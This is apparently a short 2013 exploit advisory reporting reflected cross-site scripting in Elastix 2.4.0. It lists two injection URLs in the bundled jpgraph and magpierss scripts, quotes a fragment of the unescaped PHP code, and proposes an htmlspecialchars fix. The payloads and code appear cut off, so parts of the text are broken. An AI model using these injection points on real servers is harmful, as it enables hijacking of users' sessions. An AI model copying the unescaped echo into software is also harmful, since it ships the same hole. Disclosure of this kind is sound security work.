# Exploit Title: elastix 2.4.0 XSS Vulnerability
# Date: 28/05/2013
# Exploit Author: cheki
# Vendor Homepage: elastix.org
# Software Link: http://www.elastix.org/index.php/en/downloads/main-distro.html
# Version: Elastix 2.4.0 Stable
# CVE : [not yet]
-------------------------------------------------------------------------------------
exploit: https://10.10.10.78/libs/jpgraph/Examples/bar_csimex3.php/">
exploit2: https://10.10.10.78/libs/magpierss/scripts/magpie_simple.php?url=">
--------------------------------------------------------------------------------------
Vul Code:
-----------------------------------------------
channel['title'] . "";
echo "
";
foreach ($rss->items as $item) {
$href = $item['link'];
$title = $item['title'];
echo "- $title
";
}
echo "
";
}
?>
--------------------------------------------------
FOR ELASTIX development team
$url = $_GET['url']; // LOL
$url = htmlspecialchars($_GET['url']);
-------------------------------------------------